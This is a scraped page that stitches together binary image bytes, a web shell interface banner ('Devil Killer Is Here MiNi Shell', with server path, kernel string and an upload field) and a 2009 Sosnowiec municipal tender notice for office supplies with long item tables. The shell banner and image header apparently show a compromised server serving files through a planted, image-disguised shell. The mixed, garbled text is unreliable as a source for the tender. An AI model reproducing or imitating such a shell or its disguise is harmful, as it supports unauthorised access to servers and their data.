JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090525/164288-N-2009.html

<p class="kh_header"><b>Sosnowiec: Dostawa artykułów biurowych na potrzeby komórek organizacyjnych Urzędu Miejskiego w Sosnowcu - zadanie A, artykułów biurowych na potrzeby Powiatowej Komisji Lekarskiej - zadanie B,artykułów  biurowych na potrzeby Jednostki Realizującej Projekt - zadanie C, kopert wysyłkowych na potrzeby komórek organizacyjnych Urzędu Miejskiego w Sosnowcu - zadanie D, papieru kserograficznego na potrzeby komórek organizacyjnych  Urzędu Miejskiego w Sosnowcu - zadanie E.</b><br>
<b>Numer ogłoszenia: 164288 - 2009; data zamieszczenia: 25.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sosnowiec - miasto posiadające prawa powiatu - reprezentowana przez Prezydenta Miasta , al. Zwycięstwa 20, 41-200 Sosnowiec, woj. śląskie, tel. 032 2960600, faks (032) 296 06 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów biurowych na potrzeby komórek organizacyjnych Urzędu Miejskiego w Sosnowcu - zadanie A, artykułów biurowych na potrzeby Powiatowej Komisji Lekarskiej - zadanie B,artykułów  biurowych na potrzeby Jednostki Realizującej Projekt - zadanie C, kopert wysyłkowych na potrzeby komórek organizacyjnych Urzędu Miejskiego w Sosnowcu - zadanie D, papieru kserograficznego na potrzeby komórek organizacyjnych  Urzędu Miejskiego w Sosnowcu - zadanie E..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Załącznik nr 2A- szczegółowy formularz oferty - dla  zadania A		                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec

      Lp.	

Nazwa artykułu	
Jednostka
 miary	
Zamawiana
liczba	1
Dostawa
5 dni po podpisaniu umowy	2
Dostawa
06.07.09	3
Dostawa
09.11.09	Kwota
jednostkowa
brutto
jednostki  miary	Wartość 
całej poz.
brutto
(zamawianej liczby)
								
	1	2	3	4	5	6	7	8
1.	Blok szkolny formatu A-4
 w kratkę, 50 kartkowy nie makulaturowy	 
sztuki	
300	
----------	
150	
150		
2.	Zeszyt w kratkę format A-4, twarda oprawa 96 kartkowy	sztuki	
150	
----------	
70	
80		
3.	Zeszyt w kratkę format
A-5, 96 kartkowy, twarda oprawa	
sztuki	
150	
----------	70	80		
4.	Teczka do podpisu A-4
harmonijkowa (10 przegródek) skóropodobna	
sztuki	
200	
100	50	50		
5.	Teczka do podpisu  ze skorowidzem alfabetycznym od A do Z	sztuki	5	---------	5	--------		
6.	Skorowidz alfabetyczny A-5
twarda oprawa ( 100 kartek)	sztuki	30	15	--------	15		
7.	Skoroszyt kartonowy oczkowy do wpinania do segregatora cały (1:1)	sztuki	5000	2000	2000	1000		
8.	Segregator   7,5 cm A4 (PCV)
z wymienną etykietą	sztuki	1800	800	500	500		
9.	Segregator szer. grzbietu  5, cm A4  (PCV) z wymienną  etykietą	sztuki	500	150	200	150		
10.	Teczki wiązane tekturowe (białe)	sztuki	25 000	10 000	15 000	-----		
11.	Pudła archiwizacyjne 100mm
tekturowe	sztuki	2700	1000	700	1000		
12.	Teczka z gumką (biała) 	sztuki	1000	400	200	400		
13.	Teczka na rzepy A-4	sztuki	10	---------	10	---------		
14.	Gumka typu PILOT -średnia 
lub równoważna	sztuki	100	----------	100	--------		
15.	Dratwa 10 dkg	sztuki	10	----------	10			
16.	Taśma dwustronna 24 mm x 5 m	sztuki	10	10	--------	--------		
17.	Taśma dwustronna 50 mm x 25m	sztuki	5	5	---------	---------		
18.	Temperówka metalowa	sztuki	100	---------	50	50		
19.	Tusz do stempli (fiolet)  22ml, zwykły	sztuki	20	---------	20	---------		
20.	Tusz do stempli (czarny) 22 ml, zwykły	sztuki	100	50	--------	50		
21.	Tusz do stempli (czerwony) 
22 ml, zwykły	sztuki	40	--------	40	--------		
22.	Dziurkacz  Eagle 837 na 
 15 kartek - lub równoważny	sztuki	50	25	--------	25		
23.	Dziurkacz  Eagle AXA P6122B na 40 kartek- lub równoważny	    sztuki	30	-----------	15	15		
24.	Zszywacz Eagle AXA S 6120B na 12 kartek - lub równoważny 	    sztuki	100	50	-------	50		

Załącznik nr 2A- szczegółowy formularz oferty - dla  zadania A		                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec
Lp.	Nazwa artykułu	Jednostka
miary	Zamawiana liczba	
1
Dostawa
5 dni po podpisaniu umowy	2
  Dostawa
   06.07.09	3
Dostawa
09.11.09	Kwota
jednostkowa
brutto
jednostki
miary	Wartość 
całej          
poz. brutto
(zamawianej liczby)
								
	1	2	3	4	5	6	7	8
25.	Zszywacz Laco H 401
30 kartek, lub równoważny, dopuszczalny plastikowy długość powyżej 100 mm, -  lub równoważny	sztuki	
15	
10	
5	
----------		
26.	Rozszywacz 	sztuki	50	----------	25	25		
27.	Zszywki 24-6 
1000 sztuk w opakowaniu	pudełeczko	1000	300	400	300		
28.	Długopis  ZENITH nr 7 - lub równoważny	sztuki	550	550	---------	---------		
29.	Długopis Unix (niebieski )
- lub równoważny	sztuki	1000	400	300	300		
30.	Długopis Corvina 51(niebieski) - lub równoważny	
sztuki	
100	
100	
----------	
----------		
31.	Długopis ZENITH 1
- lub równoważny	sztuki	250	150	100	----------		
32.	Wkład do ZENITHU nr 7
- lub równoważny	sztuki	1100	500	300	300		
33.	Wkład do ZENITHU nr 1
- lub równoważny	sztuki	500	200	100	200		
34.	Wkład do Unixu (niebieski)
- lub równoważny	sztuki	500	---------	200	300		
35.	Cienkopis Stabilo (czarny)
- lub równoważny	sztuki	800	300	250	250		
36.	Cienkopis Stabilo (czerwony)
- lub równoważny	sztuki	600	200	200	200		
37.	Cienkopis Stabilo (zielony)
- lub równoważny	sztuki	300	100	100	100		
38.	Zakreślacz (żółty) DONAU
- lub równoważny	sztuki	250	100	100	50		
39.	Zakreślacz (zielony) DONAU- lub równoważny	sztuki	200	100	-----	100		
40.	Zakreślacz (pomarańczowy)
DONAU- lub równoważny	
sztuki	200	100	50	50		
41.	Zakreślacz  (różowy)
DONAU - lub równoważny	sztuki	200	100	50	50		
42.	Pisak w komplecie STAEDTLER 
( zielony, czerwony, niebieski, czarny) lub równoważny	komplet	30	---------	15	15		
43.	Długopis przylepny na sprężynce, BIFA lub równoważny	
sztuki	
80	
40	
40	
--------		

Załącznik nr 2A- szczegółowy formularz oferty - dla  zadania A		                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec
Lp.	Nazwa artykułu	Jednostka miary	Zamawiana
liczba	
1
Dostawa
5 dni po podpisaniu umowy	2
Dostawa
06.07.09	3
Dostawa
09.11.09	Kwota
jednostkowa
brutto
jednostki
miary	Wartość 
całej poz.
 brutto
(zamawianej liczby)
								
	1	2	3	4	5	6	7	8
44.	Poduszki samotuszujące.
11cm x7 cm fioletowe,	sztuki	40	--------	20	20		
45.	Poduszki samotuszujące.
11cm x7 cm czarne	sztuki	40	20	20	---------		
46.	Zszywki 24-8
(1000 sztuk - opakowanie)	pudełeczko	70	50	20	----------		
47.	Nożyczki metalowe dł 17 cm z plastikowym uchwytem  	sztuki	70	70	----------	----------		
48.	Marker czarny, gruby, wodoodporny, okrągła końcówka, firmy Stabilo - lub równoważny	sztuki	300	
200	
100	
----------		
49.	Marker czarny, gruby, wodoodporny, ścięta końcówka, firmy Stabilo lub równoważny	sztuki	50	30	20	----------		
50.	Ołówek automat PENTEL Fiesta AX 125- 0,5mm lub równoważny	sztuki	30	10	20	-----------		
51.	Grafity do ołówków ( 0,5) HB
(12 rysików opakowanie)	opakowanie	
40	20	20	----------		
52.	Korektor w płynie  z gąbką - opakowanie 20 ml	sztuki	50	10	20	20		
53.	Korektor w piórze  8 ml szybkoschnący z metalową końcówką, uchwyt połączony z dozownikiem	sztuki	50	
20	
10	
20		
54.	Korektor w taśmie  4,2 mm x 9m 	sztuki	100	100	------	------		
55.	Klej biurowy w sztyfcie 15 g DONAU lub równoważny	sztuki	2000	500	500	1000		
56.	Notes żółty samoprzylepny
7,5 x 7,5 -100 kartek w bloczku	bloczek	1000	400	300	300	
	

57.	Notes żółty samoprzylepny
7,5 x 5,0 -100 kartek w bloczku	bloczek	700	300	200	200	
58.	Kostka biurowa biała
8,5 x 8,5 (500 kartek bloczku)	bloczek	400	150	100	150		
59.	Ofertówka twarda A-4 -L
bezbarwna	sztuki	2500	800	800	900		
60.	Taśma klejąca przezroczysta 2,4 cm szeroka dł. 20m	sztuki	200	----------	100	100		
61.	Skoroszyt plastikowy A4 zawieszkowy	sztuki	500	200	150	150		
62.	Identyfikator, plastikowy, przezroczysty  9cm x 5,5 cm	sztuki	600	200	200	200		
63.	Taśma klejąca przezroczysta 4,8cm szerokości x 50m dł. 	sztuki	80	40	20	20		

Załącznik nr 2A- szczegółowy formularz oferty - dla  zadania A		                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec

Lp.	Nazwa artykułu	Jednostka miary	Zamawiana liczba	
1
Dostawa
5 dni po podpisaniu umowy	2
Dostawa
06.07.09	3
Dostawa
09.11.09	Kwota 
jednostkowa
brutto
jednostki 
miary	Wartość 
całej 
poz. 
brutto (zamawianej liczby)
								
	1	2	3	4	5	6	7	8
64.	Koszulki do segregatora A-4, 100 sztuk w opakowaniu, 
(z grubszej foli )	opakowanie	200	
100	
50	
50		
 65.	Skoroszyt plastikowy A4	sztuki	500	200	200	100		
66.	Teczka A4 z klipsem z dwiema sztywnymi okładkami 
i mechanizmem zaciskowym do papieru	sztuki	40	

20	

20	

----------		
67.	Przekładka do segregatora z kartonu, indeksy kolorowe (10) numerowana A4	opakowanie	50	

----------	
25	
25		
68.	Okładki do bindownicy przód (folia bezbarwna) (100 sztuk w opakowaniu) format A4	opakowanie	10	

----------	

10	

---------		
69.	Okładki do bindownicy tył (karton skóropodobny) 
(100 sztuk w opakowaniu) A4 kolor	opakowanie	10	

----------	

10	

-----------		
70.	Grzbiety do bindownicy 12 format A4 100 sztuk w opakowaniu	opakowanie	5	

2	

3	

-----------		
71.	Grzbiety do bindownicy 16 format A4 100 sztuk w opakowaniu	opakowanie	4	
2	
2	
-----------		
72.	Grzbiety do bindownicy 20 format A4 100 sztuk w opakowaniu	opakowanie	2	
2	---------	-----------		
73.	Spinacze metalowe pokryte kolorowym plastikiem 100 sztuk w opakowaniu 28 mm -wys.	opakowanie	800	300	200	300		
74.	Spinacze metalowe pokryte kolorowym plastikiem 50 sztuk w opakowaniu 50 mm- wys.	opakowanie	400	150	150	100		
75.	Blok do tablicy FLIBCHART  70cm x100 cm	sztuki	3	--------	3	---------		
76.	Teczki skóropodobne do podpisu z numeratorem po boku A4  (1-31)	sztuki	10	5	--------	5		

Załącznik nr 2A- szczegółowy formularz oferty - dla  zadania A		                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec

Lp.	Nazwa artykułu	Jednostka miary	Zamawiana liczba	
1
Dostawa
5 dni po podpisaniu umowy	2
Dostawa
06.07.09	3
Dostawa
09.11.09	Kwota jednostkowa
brutto
jednostki
miary	  Wartość 
całej 
poz.
 brutto (zamawianej liczby)
								
	1	2	3	4	5	6	7	8
77.	Akcesoria do tablic suchościeralnych: komplet 4 markerów, gąbka do czyszczenia z płynem, komplet magnesów 	zestaw	5	3	2	-------		
78.	Tablica korkowa
90 cm szer. x 60cm wys. w drewnianej ramce wraz z kompletem pinezek	zestaw	2	----------	2	--------		
79.	Tablica korkowa w drewnianej ramce
80 cm szer. x 50 cm wys 
wraz z kompletem pinezek	zestaw	2	----------	2	--------		
80.	Tablica korkowa w drewnianej ramce wraz z  kompletem pinezek
100 cm szer. x 60cm wys.	zestaw	2	----------	2	--------		
81.	Linijka przezroczysta plastikowa dł. 30 cm	sztuki	40	20	--------	20		
82.	Koszulki groszkowe formatu A5 opakowanie 100 sztuk	opakowanie	5	2	3	-----------		
83.	Koszulki z klapką  z boku, (opakowanie 25 sztuk )	opakowanie	10	4	4	2		
84.	Plastikowe szufladki na biurko A4	sztuki	100	50	50	---------		
85.	Blok techniczny -10 kartkowy A4	sztuki	60	60	---------	---------		
86.	Spinacze krzyżakowe duże 70 mm (opakowanie 12 sztuk)	opakowanie 	10	10	---------	---------		

Załącznik nr 2B- szczegółowy formularz oferty - dla  zadania B  	                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec
           

Lp.	

Nazwa artykułu	
Jednostka
 miary	
Zamawiana
liczba	
Dostawa
25.09.09	Kwota
jednostkowa
brutto
jednostki 
 miary	Wartość
 całej
 poz.
brutto
(zamawianej liczby)
						
	1	2	3	4	5	6
1.	Cienkopis STABILO (czarny) 
lub równoważny	sztuki	40	40		
2.	Cienkopis STABILO (niebieski) 
lub równoważny	sztuki 	40	40		
3.	Cienkopis  STABILO (zielony) 
lub równoważny	sztuki	30	30		
4.	Cienkopis  STABILO (czerwony) lub równoważny	sztuki 	30	30		
5.	Pióro kulkowe UB-150 (czarny) 
lub równoważne	sztuki	70	70		
6.	Pióro kulkowe UB-150 (niebieskie) lub równoważne	sztuki 	70	70		
7.	Pióro kulkowe UB-150 (czerwone) lub równoważne	sztuki	12	12		
8.	Pióro kulkowe MonAmi VURiter (czarne) lub równoważne	sztuki 	60	60		
9.	Pióro kulkowe MonAmi VURiter (niebieskie) lub równoważne	sztuki	60	60		
10.	Długopis typ ZENITH 7 (wkłady niebieskie) lub równoważny	sztuki 	100	100		
11.	Wkłady do długopisów  ZENITH 7 lub równoważne	sztuki	100	100		
12.	Długopisy zwykłe UNIX  (wkłady niebieskie) lub równoważne	sztuki 	100	100		
13.	Pisak biurowy  STAEDTLER 326 (czarny) lub równoważny	sztuki	40	40		
14.	Ołówek automatyczny 0,5 mm	sztuki 	12	12		
15.	Grafit do ołówków automatycznych HB Pentel Polimer lub równoważny (opakowanie 12 sztuk)	opakowanie	12	12		
16.	Ołówek drewniany HB	sztuki 	60	60		
17.	Ołówek drewniany 2B	sztuki 	60	60		
18.	Gumka techniczna typ FACTIS sofler - średnia lub równoważna	sztuki	30	30		
19.	Klej w sztyfcie DONAU lub równoważny	sztuki 	40	40		
20.	Temperówka  metalowa	sztuki	20	20		
21.	Nożyczki 17 cm - całe z metalu	sztuki 	4	4		
22.	Zszywacz obrotowy EAGLE typ 9628 lub równoważny	sztuki	10	10		
23.	Zszywki 24-6 (1000 sztuk
 w opakowaniu)	opakowanie	30	30		
24.	Zszywki 24-8 (1000 sztuk
 w opakowaniu)	opakowanie	20	20		
25.	Zszywki 23-13  (1000 sztuk
 w opakowaniu)	opakowanie	10	10		
26.	Zszywki 23-17 (1000 sztuk
 w opakowaniu)	opakowanie	10	10		
Załącznik nr 2B- szczegółowy formularz oferty - dla  zadania B  	                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec

Lp.	

Nazwa artykułu	
Jednostka
 miary	
Zamawiana
liczba	
Dostawa
25.09.09	Kwota
jednostkowa
brutto
jednostki  
miary	Wartość 
całej
 poz.
brutto
(zamawianej liczby)
						
	1	2	3	4	5	6
27.	Dziurkacz Eagle AXA P6122B-40 kartek lub równoważny	sztuka	5	5		
28.	Linijka przezroczysta, plastikowa  20 cm	sztuka	12	12		
29.	Linijka przezroczysta, plastikowa  30 cm	sztuki	12	12		
30.	Linijka przezroczysta, plastikowa  50 cm	sztuka	5	5		
31.	Korektor w taśmie  4,2 mm x 9 mm	sztuka	5	5		
32.	Przybornik  na biurko plastikowy, przezroczysty	sztuka	8	8		
33.	Notes samoprzylepny  51 mm x 76 mm (żółty)	bloczek	60	60		
34.	Notes samoprzylepny  38mm x 51mm (żółty)	bloczek	60	60		
35.	Notes samoprzylepny  76mm x 76 mm (żółty) 	bloczek	60	60		
36.	Notes samoprzylepny  75 mm x 127 mm (żółty)	bloczek	60	60		
37.	Folia samoprzylepna przezroczysta  A0 	sztuka	10	10		
38.	Brystol (biały) 70x100   B1	sztuka	10	10		
39.	Brystol (zielony) 70x100   B1	sztuka	10	10		
40.	Brystol (czerwony) 70x100   B1	sztuka	10	10		
41.	Brystol (niebieski)  70x100  B1	sztuka	10	10		
42.	Taśma samoprzylepna 19mm x 33 m	sztuka	6	6		
43.	Taśma samoprzylepna  (dwustronna)
30 mm x 5 m	sztuka	6	6		
44.	Zakładki index -typu Post-it lub równoważne	opakowanie	12	12		
45.	Skoroszyt plastikowy oczkowy  A4 (czerwony) (w op.10 szt.)	opakowanie	100	100		
46.	Skoroszyt plastikowy oczkowy  A4 (czarny) (w op.10 szt.)	opakowanie	50	50		
47.	Skoroszyt plastikowy oczkowy A4 (zielony) (w op.10 szt.)	opakowanie	50	50		
48.	Koperty C6 SK  (samoklejące)  bez nadruku - białe niemakulaturowe (w op.1000 szt.)	opakowanie	4	4		
49.	Koperty C5 SK  (samoklejące) -  białe niemakulaturowe (w op.500 szt.)	opakowanie	2	2		
50.	Koperty C4 SK  (samoklejące) -  białe niemakulaturowe ( w op.250 szt.)	opakowanie	2	2		
51.	Koperty C4 SK  (samoklejące) - brązowe niemakulaturowe
 (w op.250 szt.)	opakowanie	1	1		


Załącznik nr 2B- szczegółowy formularz oferty - dla  zadania B  	                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec

      Lp.	

Nazwa artykułu	
Jednostka
 miary	
Zamawiana
liczba	
Dostawa
25.09.09	Kwota
jednostkowa
brutto
jednostki 
 miary	Wartość 
całej 
poz.
brutto
(zamawianej liczby)
						
	1	2	3	4	5	6
52.	Teczka plastikowa zatrzaskowa biała   A4	sztuka	50	50		
53.	Ofertówka A4	sztuka	100	100		
54.	Teczka do podpisu A4, skóropodobna , z 10 przegródkami	sztuka	4	4		
55.	Koszulka na dokumenty A4
(opakowanie-100 sztuk)	opakowanie	10	10		
56.	Segregator szer. grzbietu 7,5 cm z wymienną etykietką	sztuka	15	15		
57.	Segregator szer. grzbietu 5 cm z wymienną etykietką	sztuka	15	15		
58.	Bloczek kostka 8,3 cm x 8,3 cm w pojemniku	sztuka	6	6		
59.	Bloczek kostka 8,3 cm x 8,3 cm bez pojemnika	sztuka	10	10		
60.	Brulion na spirali A4 -min 96 kartek	sztuka	12	12		
61.	Blok biurowy A4 (w kratkę)-50 kartek	sztuka	12	12		
62.	Zeszyt A5 (miękka okładka, w kratkę) - 60 kartek	sztuka	12	12		
63.	Zeszyt A5 (twarda okładka, w kratkę) -96 kartek	sztuka	12	12		
64.	Spinacze metalowe pokryte kolorowym plastikiem 50 sztuk w opakowaniu 50 mm- wys.	opakowanie	30	30		
65.	 Komplet zakreślaczy  typu DONAU lub równoważny (opakowanie 4 sztuki)	opakowanie	8	8		

Załącznik nr 2C- szczegółowy formularz oferty - dla  zadania C  	                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec
      Lp.	

Nazwa artykułu	
Jednostka
 miary	
Zamawiana
liczba	
Dostawa
w ciągu 7 dni od podpisania umowy	Kwota
jednostkowa
brutto
jednostki 
 miary	Wartość 
całej 
poz.
brutto
(zamawianej liczby)
						
	1	2	3	4	5	6
1.	Rysiki do ołówków automatycznych B, 0,5-opakowanie 12 sztuk	opakowanie	4	4		
2.	Szufladki  plastikowe na dokumenty A4	sztuki	9	9		
3.	Bloczki żółte samoprzylepne 50 mm x 75mm	bloczek	75	75		
4.	Bloczki żółte samoprzylepne 75mm x 75mm	bloczek	75	75		
5.	Brulion w twardej oprawie A5 96 kartek	sztuki	20	20		
6.	Cienkopisy wodoodporne do płyt CD-DVD	sztuki	3	3		
7.	Długopis Zenith  7 z niebieskim wkładem, lub równoważny	sztuki	10	10		
8.	Długopis Zenith  7 z czarnym wkładem lub równoważny	sztuki	10	10		
9.	Dziennik korespondencyjny A4- 94 kartki twarda oprawa	sztuki	3	3		
10.	Gumki do mazania FACTIS- średnie lub równoważne 	sztuki	5	5		
11.	Klej w tubce Donau 36 g lub równoważny	sztuki	5	5		
12.	Korektor w taśmie 4,2 mmx 9m	sztuki	5	5		
13.	Korektor w piórze 8 ml szybkoschnący z metalową końcówką uchwyt połączony z dozownikiem	sztuki	5	5		
14.	Korektor w płynie z gąbką -poj. 20 ml	sztuki	5	5		
15.	Koperty białe 16cm x 11cm niemakulaturowe	sztuki	150	150		
16.	Koperty białe 25cm x 17,5 cm niemakulaturowe	sztuki	150	150		
17.	Koperty białe 32,5cm x 23 cm niemakulaturowe	sztuki	150	150		
18.	Koperty białe 46 cm x 30 cm samoklejące 
z rozszerzanym bokiem niemakulaturowe	sztuki	150	150		
19.	Koperty z zabezpieczeniem powietrznym 11,5cm x 21,5cm niemakulaturowe	sztuki	30	30		
20.	Koperty z zabezpieczeniem powietrznym 26,5cm x 36cm	sztuki	30	30		
21.	Koszulki z grubszej folii  A4, (100 sztuk 
w opakowaniu)	opakowanie	20	20		
22.	Koszulki na 1 CD-DVD, ( 10 sztuk 
w opakowaniu)	opakowanie	15	15		
23.	Koszulki na wizytówki, ( 10 sztuk 
w opakowaniu)	opakowanie	5	5		
24.	Koszulki na zdjęcia o wymiarze 10cm x 15, 1cm (10 sztuk w opakowaniu)	opakowanie	5	5		
25.	Komplet linijek  plastikowych (ekierka, linijka, kątomierz)	komplet	3	3		
26.	Nożyczki całe metalowe-17 cm	sztuki	9	9		
27.	Nóż do kopert z drewnianym uchwytem	sztuki	2	2		
28.	Ofertówki, A4 (25 sztuk w opakowaniu)	opakowanie	8	8		

Załącznik nr 2C- szczegółowy formularz oferty - dla  zadania C  	                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec
      Lp.	

Nazwa artykułu	
Jednostka
 miary	
Zamawiana
liczba	1
Dostawa 
w ciągu 7 dni od podpisania umowy
	Kwota
jednostkowa
brutto
jednostki  
miary	Wartość 
całej poz.
brutto
(zamawianej liczby)
						
	1	2	3	4	5	6
29.	Ołówki automatyczne typu Pentel 0,5 lub równoważne	sztuka	10	10		
30.	Papier samoprzylepny - czerwony A4	sztuka	20	20		
31.	Papier samoprzylepny - niebieski A4	sztuka	20	20		
32.	Papier samoprzylepny - zielony A4	sztuka	20	20		
33.	Pojemnik na kartki plastikowy 9cm x 9 cm	sztuka	9	9		
